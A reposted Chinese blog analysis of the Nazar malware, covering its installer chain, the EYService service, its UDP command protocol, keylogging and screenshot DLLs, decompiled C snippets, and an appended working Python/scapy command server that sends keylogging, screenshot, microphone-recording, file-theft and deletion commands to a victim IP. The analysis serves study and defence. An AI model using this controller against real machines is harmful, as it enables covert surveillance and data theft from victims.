商务合作
  1. Worktile社区首页
  2. 其他

如何深度分析Nazar 组件

亿速云 其他 阅读 565

6:22 AM 11/7/2012 conficker still on target

6:18 AM 11/7/2012 checking logs – we are clean

8:16 PM 7/2/2012 – BOOM!, got the callback

这些是方程组(NSA)在攻击目标系统留下的记录,后来被Shadow Brokers泄露。 最近,安全研究员透露了一个先前被错误识别且未知的威胁组织Nazar,下面将对Nazar组件进行深入分析

事件背景

影子经纪人泄漏的数据使众多漏洞(例如EternalBlue)成为众人关注的焦点,但其中还包含了许多更有价值的组件,这些组件显示了Equation Group在发动攻击之前采取的一些预防措施。

如何深度分析Nazar 组件

例如,在泄漏文件中名为“ drv_list.txt”的文件,其中包含驱动程序名称列表和相应的注释,如果在目标系统上找到了驱动程序,则会将信息发送给攻击者。

如何深度分析Nazar 组件

列表中还包含恶意驱动程序的名称,如果找到这些恶意驱动程序,表明目标系统已经被其他人破坏,然后警告攻击者“撤回”。负责此类检查的关键组件名为“Territorial Dispute”或者“TeDi”。

如何深度分析Nazar 组件

“ TeDi”包含45个签名,可在目标系统中搜索与其他威胁组织关联的注册表项和文件名。与安全扫描不同,攻击者最终目的是确保自身操作不会受到干扰,其他攻击者不会检测到他们的工具。

如何深度分析Nazar 组件

在某些情况下,防止自身操作不会干扰“友好”威胁组的运行,也不会同时攻击同一目标。

如何深度分析Nazar 组件

安全研究员指出,“ TeDi”中的第37个签名是寻找名为“ Godown.dll”的文件,它指向的就是伊朗威胁组织“Nazar”。

如何深度分析Nazar 组件

执行流程

Nazar在2008年左右开始活动,可能与第‘TeDi’第37个签名相关,它负责检测Nazar工具插件“ Godown.dll”。

如何深度分析Nazar 组件

Nazar执行的初始二进制文件是gpUpdates.exe。 它是由“ Zip 2 Secure EXE”创建的自解压文档(SFX)。 执行后,gpUpdates将三个文件写入磁盘:Data.bin,info和Distribute.exe, 然后gpUpdates.exe将启动Distribute.exe。

Distribute.exe

首先,Distribute.exe将读取info和Data.bin。 Data.bin是一个二进制Blob,其中包含多个PE文件。info文件非常小,其中包含一个简单的结构,该结构表示Data.bin中PE文件的长度。 Distribute.exe将按文件长度的顺序逐个读取Data.bin。下表显示了Data.bin文件与info写入长度的关系。

如何深度分析Nazar 组件

之后Distribute.exe使用regsv***将3个DLL文件写入注册表中。

如何深度分析Nazar 组件

使用CreateServiceA将svchost.exe添加为名为“ EYService”的服务,启动该服务并退出。 该服务是攻击的主要部分,协调Nazar调用模块。

如何深度分析Nazar 组件

通信分析

服务执行后,首先设置数据包嗅探。 

DWORD __stdcall main_thread(LPVOID lpThreadParameter){  HANDLE hMgr; // edi  HANDLE hCfg; // esi  HANDLE hFtr; // edi  hMgr = MgrCreate();  MgrInitialize(hMgr);  hCfg = MgrGetFirstAdapterCfg(hMgr);  do  {    if ( !AdpCfgGetAccessibleState(hCfg) )      break;    hCfg = MgrGetNextAdapterCfg(hMgr, hCfg);  }  while ( hCfg );  ADP_struct = AdpCreate();  AdpSetConfig(ADP_struct, hCfg);  if ( !AdpOpenAdapter(ADP_struct) )  {    AdpGetConnectStatus(ADP_struct);    MaxPacketSize = AdpCfgGetMaxPacketSize(hCfg);    adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);    AdpCfgGetMACAddress(hCfg, &mac_address, 6);    hFtr = BpfCreate();    BpfAddCmd(hFtr, BPF_LD_B_ABS, 23u);         //  Get Protocol field value    BpfAddJmp(hFtr, BPF_JMP_JEQ, IPPROTO_UDP, 0, 1);// Protocol == UDP    BpfAddCmd(hFtr, BPF_RET, 0xFFFFFFFF);    BpfAddCmd(hFtr, BPF_RET, 0);    AdpSetUserFilter(ADP_struct, hFtr);    AdpSetUserFilterActive(ADP_struct, 1);    AdpSetOnPacketRecv(ADP_struct, on_packet_recv_handler, 0);    AdpSetMacFilter(ADP_struct, 2);    while ( 1 )    {      if ( s较好_and_ping == 1 )      {        adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);        connection_method(2);        s较好_and_ping = 0;      }      Sleep(1000u);    }  }  return 0;}

每当UDP数据包到达时,无论是否存在响应,都会记录其源IP以用于下一个响应。 然后检查数据包的目标端口,如果是1234,则将数据将转发到命令处理器。 

int __cdecl commandMethodsWrapper(udp_t *udp_packet, int zero, char *src_ip, int ip_id){  int length; // edi  length = HIBYTE(udp_packet->length) - 8;  ntohs(udp_packet->src_port);  if ( ntohs(udp_packet->dst_port) != 1234 )    return 0;  commandDispatcher(&udp_packet[1], src_ip, ip_id, length);  return 1;}

数据响应

每个响应都会从头开始构建数据包,响应分为3种类型:

1、发送ACK:目标端口4000,有效负载101; 0000

2、发送计算机信息:目标端口4000,有效负载100; <计算机名称>; <操作系统名称>

3、发送文件:通过UDP发送数据,然后是带有<size_of_file>的数据包。如果服务器将标识为0x3456的数据包发送到目标端口1234,恶意软件将使用目标端口0x5634发送响应。

如何深度分析Nazar 组件

支持命令

下表为命令支持列表:

如何深度分析Nazar 组件

Dll分析

Godown.dll

Godown.dll是SIG37重点关注的DLL,它是一个小型DLL,只有一个关闭计算机的功能。

Filesystem.dll

Filesystem.dll是由攻击者自己编写的模块。该模块的目的是枚举受感染系统上的驱动器,文件夹和文件,并将结果写入Drives.txt和Files.txt。

目前发现两个版本均包含PDB路径,其中提到了波斯语为Khzer(或خضر)的文件夹:

C:\khzer\DLLs\DLL’s Source\Filesystem\Debug\Filesystem.pdb

D:\Khzer\Client\DLL’s Source\Filesystem\Debug\Filesystem.pdb

两条路径之间存在一些差异,表明该模块的两个版本不是在同一环境中编译的。

如何深度分析Nazar 组件

hodll.dll

hodll.dll模块负责键盘记录,通过设置钩子来完成。该代码来自开源代码库,某种程度上像从互联网上复制了多个项目的代码,最终拼装在一起。

ViewScreen.dll

该DLL基于名为“ BMGLib”的开源项目,用于获取受害者计算机的屏幕截图。

附录

IOCs

如何深度分析Nazar 组件

Python Server

from scapy.all import *import structimport socketimport hexdumpimport argparseDST_PORT = 1234# 4000 is the usual port without sending files, but we use it for everything, because why not?SERVER_PORT = 4000# We want to make sure the ID has the little endian of itID = struct.unpack('>H',struct.pack('<H',4000))[0]def get_response(sock, should_loop):    started = False    total_payload = b''    while(should_loop or not started):        try:            payload, client_address = sock.recvfrom(4096)        except ConnectionResetError:                payload, client_address = sock.recvfrom(4096)                total_payload += payload        # Good enough s较好 condition        if (len(payload) >= 4            and payload[:3] == b'---'            and payload[4] >= ord('0')            and payload[4] <= ord('9')):            should_loop = False        started = True    hexdump.hexdump(total_payload)MENU = """Welcome to NAZAR. Please choose:          999 - Get a ping from the victim.          555 - Get information on the victim's machine.          311 - Start keylogging (312 to disable).          139 - Shutdown victim's machine.          189 - Screenshot (313 to disable).          119 - Record audio from Microphone (315 to disable).          199 - List drives.          200 - List recursivley from directory*.          201 - Send a file*.          209 - Remove file*.          599 - List devices.* (append a path, use double-backslashes)quit to Quit,help for this menu.            """def get_message():    while True:        curr_message = input('> ').strip()        if 'quit' in curr_message:            return None        if 'help' in curr_message:            print(MENU)        else:            return curr_messagedef get_sock():    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)    server_address = '0.0.0.0'    server = (server_address, SERVER_PORT)    sock.bind(server)    return sock     def main(ip_addr):    sock = get_sock()        print(MENU)    multi_packets = ["200","201", "119", "189", "311", "199", "599"]    single_packets = ["999", "555"]    all_commands = single_packets + multi_packets    while True:                curr_message = get_message()        if not curr_message:            break                # Send message using scapy        # Make sure the IP identification field is little endian of the port.        sr1(            IP(dst=ip_addr, id=ID)/            UDP(sport=SERVER_PORT,dport=1234)/            Raw(load=curr_message),            verbose=0        )        command = curr_message[:3]        if command not in all_commands:            continue        should_loop = command in multi_packets        get_response(sock, should_loop)if __name__ == '__main__':    parser = argparse.ArgumentParser(description="victim's IP")    parser.add_argument('ip')    args = parser.parse_args()    main(args.ip)

关于如何深度分析Nazar 组件问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

文章标题:如何深度分析Nazar 组件,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/24971

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
0 0
上一篇 2022年9月15日 上午1:37
下一篇 2022年9月15日 上午1:38

相关推荐

  • IDEA如何配置Maven 其他

    IDEA如何配置Maven

    一、Maven下载&环境配置 1.下载Maven 2.解压 解压下载好的文件: 创建一个文件夹maven-repository用来充当本地仓库: 3.配置环境变量 新建一个MAVEN_HOME,添加Maven的路径: 编辑Path,新建一个环境变量%MAVEN_HOME%bin: 4.测试 …

    亿速云的头像 亿速云
    2022年8月30日
    97100
  • 用于解析mac地址的协议是哪个 其他

    用于解析mac地址的协议是哪个

    用于解析mac地址的协议是“RARP”。RARP(反向地址转换协议)可以将MAC地址解析为IP地址,允许局域网的物理机器从网关服务器的ARP表或者缓存上请求其IP地址。RARP发出要反向解析的物理地址并希望返回其对应的IP地址,应答包括由能够提供所需信息的RARP服务器发出的IP地址。 本教程操作环…

    亿速云的头像 亿速云
    2022年9月18日
    70400
  • 导入mdf文件损坏如何解决 其他

    导入mdf文件损坏如何解决

    解决方法: 1、安装D-RecoveryForMSSQLServer软件。 2、进入主界面。 3、点击“打开数据库文件”。 4、选择损坏文件点击“确定”。 5、左侧为打开文件。 6、点击把所有表导入数据库。 7、将信息填完整即可。 以上就是关于“导入mdf文件损坏如何解决”这篇文章的内容,相信大家都…

    亿速云的头像 亿速云
    2022年9月8日
    46500
  • win8如何取消开机账户登录 其他

    win8如何取消开机账户登录

    win8取消开机账户登录的方法 1、win+r打开运行界面。 2、对话框输入“netplwiz”,回车确定。 3、然后把“要使用本计算机,用户必须输入用户名和密码”前面的勾去掉。 4、点击确定之后系统会再次弹出一个密码输入框,这个时候我们再次输入密码点击确定就可以了。 关于“win8如何取消开机账户…

    亿速云的头像 亿速云
    2022年9月24日
    40400
  • mysql有什么权限表 其他

    mysql有什么权限表

    mysql的权限表有:1、user表,用来记录允许连接到服务器的账号信息,该表里启用的所有权限都是全局级的,适用于所有数据库;2、db表,存储了用户对某个数据库的操作权限;3、tables_priv表,用来对单个表进行权限设置;4、columns_priv表,用来对单个数据列进行权限设置;5、pro…

    亿速云的头像 亿速云
    2022年9月19日
    76400
  • windows xbox商店常见问题怎么解决 其他

    windows xbox商店常见问题怎么解决

    xbox商店常见问题解决方法: 1、Xbox商店其实就是微软win10商店(Microsoft Store)。 2、我们可以直接在菜单中打开Microsoft Store,进行游戏的查看等。 3、我们也可以直接在搜索栏中搜索Xbox,然后打开“Xbox 控制台小帮手” 4、我们能够在侧栏目中点击“商…

    亿速云的头像 亿速云
    2022年9月22日
    59500
  • 怎么用Python实现自动化处理每月考勤缺卡数据 其他

    怎么用Python实现自动化处理每月考勤缺卡数据

    一、效果展示 1.实现效果 首先来看下实现效果。 大体实现步骤如下: 步骤1:在D盘中新建“每月缺卡数据处理“文件夹(已在代码中固定死了,必须建该文件夹)。 步骤2:把处理考勤缺失的exe文件和原始数据文件放到step1新建的文件夹中。 步骤3:点击exe文件,会自动出来csv结果文件,具体格式如下…

    亿速云的头像 亿速云
    2022年9月21日
    78700
  • css如何实现右上角 其他

    css如何实现右上角

    右上角 #triangle-topright { width: 0; height: 0; border-top: 100px solid red; border-left: 100px solid transparent;} 感谢你能够认真阅读完这篇文章,希望小编分享的“css如何实现右上角”这篇…

    亿速云的头像 亿速云
    2022年9月1日
    85800
  • Java怎么通过动态代理实现一个简单的拦截器操作 其他

    Java怎么通过动态代理实现一个简单的拦截器操作

    一、代理 在使用动态代理实现拦截器之前我们先简单了解一下什么Java的代理。 代理,顾名思义,就是不直接操作被代理(下面都用目标对象称呼,听起来舒服一些)对象,而是通过一个代理对象去间接的使用目标对象中的方法。代理分为两种模式,一种是静态代理,一种是动态代理。接下来先写一个静态代理的例子。 无论是静…

    亿速云的头像 亿速云
    2022年8月27日
    65800
  • mybatisplus雪花算法生成Id怎么使用 其他

    mybatisplus雪花算法生成Id怎么使用

    雪花算法实战 1.建表 DROP TABLE IF EXISTS user;CREATE TABLE user( id BIGINT(20) NOT NULL COMMENT ‘主键ID’, name VARCHAR(30) NULL DEFAULT NULL COMMENT ‘姓名’, age I…

    亿速云的头像 亿速云
    2022年9月21日
    1.1K00
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部
PingCode智能化研发管理工具,25人以下免费使用。      亮数据-批量采集数据神器,LLM数据源轻松搞定。不成功不收费!